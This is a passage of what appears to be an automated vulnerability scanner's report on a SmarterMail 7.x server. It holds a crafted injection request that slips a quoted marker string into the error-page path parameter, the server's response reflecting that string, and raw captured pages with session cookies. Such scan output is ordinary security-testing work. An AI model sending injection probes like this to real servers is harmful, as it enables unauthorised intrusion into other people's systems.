<div id="ctl00_BPH_DeleteIcon" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoDeleteQuery_ctl00_BPH_DeleteIcon(); return false;"><span class="BBInner">Delete</span></a></div>
<div id="ctl00_BPH_btnShowHideSearchBar" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ToggleSearch();; return false;"><span class="BBInner">Search</span></a></div>
</div>
<div class="ButtonBarRight">
</div>
<div class="ButtonBarClear">
<div class="ie6fix">
</div>
</div>
</div>
<div id="ctl00_SearchRow" class="SearchRow" style="display:none;">
<table class="SearchContents">
<tr>
<td class="SCText">
Search
<input name="ctl00$SPH$txtSearchString" type="text" id="ctl00_SPH_txtSearchString" OnKeyPress="return EnterHandler(event, function(){__doPostBack('ctl00$SPH$btnGo','')});" />
<select name="ctl00$SPH$lstColors" id="ctl00_SPH_lstColors" OnKeyPress="return EnterHandler(event, function(){__doPostBack('ctl00$SPH$btnGo','')});">
<option value="">All Colors</option>
<option value="white">White</option>
<option value="yellow">Yellow</option>
<option value="pink">Pink</option>
<option value="green">Green</option>
<option value="blue">Blue</option>
</select>
<select name="ctl00$SPH$lstCategories" id="ctl00_SPH_lstCategories" OnKeyPress="return EnterHandler(event, function(){__doPostBack('ctl00$SPH$btnGo','')});">
<option selected="selected" value="">All Categories</option>
<option value=" ">No Category</option>
<option value="1">1</option>
</select>
</td>
<td class="SCButtons">
<div id="ctl00_SPH_btnGo" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$SPH$btnGo',''); return false;"><span class="BBInner">Find Now</span></a></div>
<script type="text/javascript">
window.setInterval("if (invalid) { invalid = false; Refresh(); }", 333);
function Refresh() { __doPostBack('ctl00$SPH$btnGo',''); }
function ClearText()
{
var el = document.getElementById('ctl00_SPH_txtSearchString');
if (el) el.value = "";
el = document.getElementById('ctl00_SPH_lstCategories');
if (el) el.selectedIndex = 0;
el = document.getElementById('ctl00_SPH_lstColors');
if (el) el.selectedIndex = 0;
}
function DoubleClick(newUrl, uid, isNew)
{
OpenUniqueNewMessage(newUrl, 600, 500, uid);
}
</script>
<div id="ctl00_SPH_btnClear" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ClearText(); __doPostBack('ctl00$SPH$btnClear',''); return false;"><span class="BBInner">Clear</span></a></div><script type='text/javascript'>ToggleSearchClear = function() { ClearText(); __doPostBack('ctl00$SPH$btnClear',''); return false; }</script>
</td>
</tr>
</table>
</div>
<span id="ctl00_UpdatePanel1">
</span>
<div id="Scrollable" class="ContentDiv">
<span id="ctl00_MPH_HyperContextMenu1">
<!-- HyperMenu -->
<div class='hmMenuBar '><div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmMenu hmMenuBar hmSub hmContext hmList' id='ctl00_MPH_ctl01' name='ctl00$MPH$ctl01' style='z-index:800'>
<li class='hmItem hmFirst' id='ctl00_MPH_ctl01_hm0' style='z-index: 800'><a class='hmA' href='#'>Edit</a></li>
<li class='hmItem hmLast' id='ctl00_MPH_ctl01_hm1' style='z-index: 800'><a class='hmA' href='#'>Delete</a></li>
</ul>
<div class='hmScrollDown'></div></div>
</div>
</span>
<div id="ctl00_MPH_UP1">
<div class="HyperGridWrapper" id="ctl00_MPH_HyperGrid1">
<div class="HyperGrid">
<table class="HyperGrid" id="ctl00_MPH_HyperGrid1_Table">
<thead>
<tr><th scope="col" class="showsel lc CheckBoxColumn" style="overflow: hidden"><input type="checkbox" id="ctl00_MPH_HyperGrid1CheckAll" name="ctl00$MPH$HyperGrid1CheckAll" /></th><th scope="col" class="SmallImage" style="overflow: hidden"> </th><th scope="col" class="leftpad" style="overflow: hidden"><a class='SortableHeader' href="javascript:__doPostBack('ctl00$MPH$HyperGrid1','sort=text')">Note</a></th><th scope="col" class="rc leftpad" style="overflow: hidden"><a class='SortableHeader' href="javascript:__doPostBack('ctl00$MPH$HyperGrid1','sort=realdate')">Date<img src='/App_Themes/Default/Images/Misc/down.gif' /></a></th></tr>
</thead>
<tbody>
<tr class="firstrow"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_NTQ3ZjE3ZGZhMjkxNDY2NTgwNWQyOTExZjA1NTE0ZTI-" name="ctl00_MPH_HyperGrid1_CB64_NTQ3ZjE3ZGZhMjkxNDY2NTgwNWQyOTExZjA1NTE0ZTI-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_YmQwN2YyMjJkNDgyNDRmZmFhNmQ3MzEzMGNmMjM1NWU-" name="ctl00_MPH_HyperGrid1_CB64_YmQwN2YyMjJkNDgyNDRmZmFhNmQ3MzEzMGNmMjM1NWU-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_MTExNWM5OWZhMmE5NDhjYWI5MTY3Zjk3YmRlNTcxNjc-" name="ctl00_MPH_HyperGrid1_CB64_MTExNWM5OWZhMmE5NDhjYWI5MTY3Zjk3YmRlNTcxNjc-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_ZGQxOGIwNWJjMjgzNDgyOWFlZjI4ZmJjMjA4ZGEwYzQ-" name="ctl00_MPH_HyperGrid1_CB64_ZGQxOGIwNWJjMjgzNDgyOWFlZjI4ZmJjMjA4ZGEwYzQ-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_NTdkNjE3OGU3NjkzNDViYWI2ZDk1OTMxMGNhMTJmZTA-" name="ctl00_MPH_HyperGrid1_CB64_NTdkNjE3OGU3NjkzNDViYWI2ZDk1OTMxMGNhMTJmZTA-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_YzU3ZjA0NzMxZDUxNGQzZjg2YTE4YjBjZDEzZGYxMDU-" name="ctl00_MPH_HyperGrid1_CB64_YzU3ZjA0NzMxZDUxNGQzZjg2YTE4YjBjZDEzZGYxMDU-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_YTMwZmNjNWZmOGNkNDZhN2JhMmJkZDI1MmU0MTlmNTI-" name="ctl00_MPH_HyperGrid1_CB64_YTMwZmNjNWZmOGNkNDZhN2JhMmJkZDI1MmU0MTlmNTI-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_YjlmMWRhZmVlODQ3NDQzYmFjNWQzMmY3NjI1NTc0ZTI-" name="ctl00_MPH_HyperGrid1_CB64_YjlmMWRhZmVlODQ3NDQzYmFjNWQzMmY3NjI1NTc0ZTI-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad&quo..
|
- /Main/frmSyncMLList.aspx
/Main/frmSyncMLList.aspx |
Injection URL
http://vulnerable.smartermail.7.x.host:9998/frmError.aspx?aspxerrorpath=/Main/Alerts/frmAlert.aspx/%22ns=%22netsparker(0x0038D2)
Injection Request
GET /frmError.aspx?aspxerrorpath=/Main/Alerts/frmAlert.aspx/%22ns=%22netsparker(0x0038D2) HTTP/1.1
Referer: http://vulnerable.smartermail.7.x.host:9998/Main/Alerts/frmAlert.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn; SelectedLanguage=en
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Referer: http://vulnerable.smartermail.7.x.host:9998/Main/Alerts/frmAlert.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn; SelectedLanguage=en
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Identification Request
GET /Main/frmSyncMLList.aspx HTTP/1.1
Referer: http://vulnerable.smartermail.7.x.host:9998/Main/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn; SelectedLanguage=en
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Referer: http://vulnerable.smartermail.7.x.host:9998/Main/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn; SelectedLanguage=en
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Injection Response
HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 02:42:31 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 2332
Connection: Close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" class="Error">
<head id="ctl00_Head1"><title>
Message - hoytllc.com - SmarterMail
</title>
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />
<link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Main/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Mail/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Error/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Telerik&rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="Error" dir="ltr">
<form method="post" action="frmError.aspx?aspxerrorpath=%2fMain%2fAlerts%2ffrmAlert.aspx%2f%22ns%3d%22netsparker(0x0038D2)" id="aspnetForm" class="Error">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJMTE0MTI3MTY2DxYGHghfX19UaXRsZQUHTWVzc2FnZR4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWAgIFD2QWBAIDDw8WAh4EVGV4dAVSJiN4MkY7TWFpbiYjeDJGO0FsZXJ0cyYjeDJGO2ZybUFsZXJ0LmFzcHgmI3gyRjsmcXVvdDtucz0mcXVvdDtuZXRzcGFya2VyKDB4MDAzOEQyKWRkAgcPDxYCHwMFI1BhZ2Ugbm90IGZvdW5kIG9yIHVua25vd24gZXhjZXB0aW9uZGRkhR1wEqGoaoye4+rEy/25HTG4hDw=" />
</div>
<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>
<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&t=633802452069218315" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&t=ffffffffec2d9970" type="text/javascript"></script>
<script type="text/javascript">
if (parent.isRoot != null)
parent.location.href = location.href;
</script>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls([], [], [], 90);
//]]>
</script>
<div class="CenteredError">
<div class="ShadowBox">
<div class="ErrorBox">
<div class="ErrorTitle">
<div class="RoundedPageTitleLeft">
<div class="RoundedPageTitleRight">
<div class="ErrorTitleText">
An Error Occurred
</div>
</div>
</div>
</div>
<div class="RoundedBottom">
<div class="RoundedLeft">
<div class="RoundedRight">
<div class="RoundedBottomLeft">
<div class="RoundedBottomRight">
<div class="ErrorSpacer">
</div>
<div class="ErrorContent">
<div class="ErrorSetting">
<div class="ErrorLabel">
Page:
</div>
<span id="ctl00_MPH_lblPageName">/Main/Alerts/frmAlert.aspx/"ns="netsparker(0x0038D2)</span>
</div>
<div class="ErrorSetting">
<div class="ErrorLabel">
Message
</div>
<span id="ctl00_MPH_lblError">Page not found or unknown exception</span>
</div>
</div>
<div class="ErrorButtons">
<div class="ErrorButtonsLeft">
</div>
<div id="ctl00_BrPH_BackIcon" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$BrPH$BackIcon',''); return false;"><span class="BBInner">Back</span></a></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>
<script type="text/javascript">
//<![CDATA[
UpdateSidebarCounts('UserSync', 0);
Sys.Application.initialize();
//]]>
</script>
</form>
</body>
</html>
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 02:42:31 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 2332
Connection: Close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" class="Error">
<head id="ctl00_Head1"><title>
Message - hoytllc.com - SmarterMail
</title>
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />
<link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Main/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Mail/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Error/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Telerik&rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="Error" dir="ltr">
<form method="post" action="frmError.aspx?aspxerrorpath=%2fMain%2fAlerts%2ffrmAlert.aspx%2f%22ns%3d%22netsparker(0x0038D2)" id="aspnetForm" class="Error">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJMTE0MTI3MTY2DxYGHghfX19UaXRsZQUHTWVzc2FnZR4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWAgIFD2QWBAIDDw8WAh4EVGV4dAVSJiN4MkY7TWFpbiYjeDJGO0FsZXJ0cyYjeDJGO2ZybUFsZXJ0LmFzcHgmI3gyRjsmcXVvdDtucz0mcXVvdDtuZXRzcGFya2VyKDB4MDAzOEQyKWRkAgcPDxYCHwMFI1BhZ2Ugbm90IGZvdW5kIG9yIHVua25vd24gZXhjZXB0aW9uZGRkhR1wEqGoaoye4+rEy/25HTG4hDw=" />
</div>
<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>
<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&t=633802452069218315" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&t=ffffffffec2d9970" type="text/javascript"></script>
<script type="text/javascript">
if (parent.isRoot != null)
parent.location.href = location.href;
</script>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls([], [], [], 90);
//]]>
</script>
<div class="CenteredError">
<div class="ShadowBox">
<div class="ErrorBox">
<div class="ErrorTitle">
<div class="RoundedPageTitleLeft">
<div class="RoundedPageTitleRight">
<div class="ErrorTitleText">
An Error Occurred
</div>
</div>
</div>
</div>
<div class="RoundedBottom">
<div class="RoundedLeft">
<div class="RoundedRight">
<div class="RoundedBottomLeft">
<div class="RoundedBottomRight">
<div class="ErrorSpacer">
</div>
<div class="ErrorContent">
<div class="ErrorSetting">
<div class="ErrorLabel">
Page:
</div>
<span id="ctl00_MPH_lblPageName">/Main/Alerts/frmAlert.aspx/"ns="netsparker(0x0038D2)</span>
</div>
<div class="ErrorSetting">
<div class="ErrorLabel">
Message
</div>
<span id="ctl00_MPH_lblError">Page not found or unknown exception</span>
</div>
</div>
<div class="ErrorButtons">
<div class="ErrorButtonsLeft">
</div>
<div id="ctl00_BrPH_BackIcon" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$BrPH$BackIcon',''); return false;"><span class="BBInner">Back</span></a></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>
<script type="text/javascript">
//<![CDATA[
UpdateSidebarCounts('UserSync', 0);
Sys.Application.initialize();
//]]>
</script>
</form>
</body>
</html>
Identification Response
HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 06:57:26 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 311908
Connection: Close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
Synchronization - hoytllc.com - SmarterMail
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Main/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Mail/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Telerik&rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="" dir="ltr">
<form method="post" action="frmSyncMLList.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJMjIxNTE5NTQ3DxYGHhBfX19SZXN1bHRGYWlsdXJlZR4QX19fUmVzdWx0U3VjY2Vzc2UeBF9zR0ZnFgJmD2QWAgIBD2QWBgIEDxYEHgVzdHlsZQUNZGlzcGxheTpub25lOx4HVmlzaWJsZWhkAgYPFgIfBGhkAgcPZBYCZg9kFgICAQ8WAh8EaBYCAgEPFgIeBFRleHRlZBgGBRdjdGwwMCRUUEgkVGFiU3RyaXAkVGFiMw8y2wsAAQAAAP////8BAAAAAAAAAAQBAAAA4gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5EaWN0aW9uYXJ5YDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAdWZXJzaW9uCENvbXBhcmVyCEhhc2hTaXplDUtleVZhbHVlUGFpcnMAAwADCJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0I5gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV1bXQUAAAAJAgAAAAcAAAAJAwAAAAQCAAAAkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQAAAAAHAwAAAAABAAAABQAAAAPkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQT8////5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0CAAAAA2tleQV2YWx1ZQECBgUAAAAHRW5hYmxlZAgBAQH6/////P///wYHAAAABFRleHQKAfj////8////BgkAAAAKUmVzb3VyY2VJRAYKAAAAC0BBY3RpdmVTeW5jAfX////8////BgwAAAAIU2VsZWN0ZWQIAQAB8/////z///8GDgAAAApQYWdlVmlld0lEBg8AAAAMcHZBY3RpdmVTeW5jC2QFF2N0bDAwJE1QSCRncmRBY3RpdmVTeW5jDwUkVHJ1ZXxUcnVlfHxGYWxzZXxUcnVlfHxGYWxzZXxGYWxzZXwwZAUTY3RsMDAkTVBIJGdyZFN5bmNNTA8FJFRydWV8VHJ1ZXx8RmFsc2V8VHJ1ZXx8RmFsc2V8RmFsc2V8MGQFGWN0bDAwJE1QSCRncmRBZGRUb091dGxvb2sPBSRUcnVlfFRydWV8fEZhbHNlfFRydWV8fEZhbHNlfEZhbHNlfDBkBRdjdGwwMCRUUEgkVGFiU3RyaXAkVGFiMQ8y0wsAAQAAAP////8BAAAAAAAAAAQBAAAA4gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5EaWN0aW9uYXJ5YDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3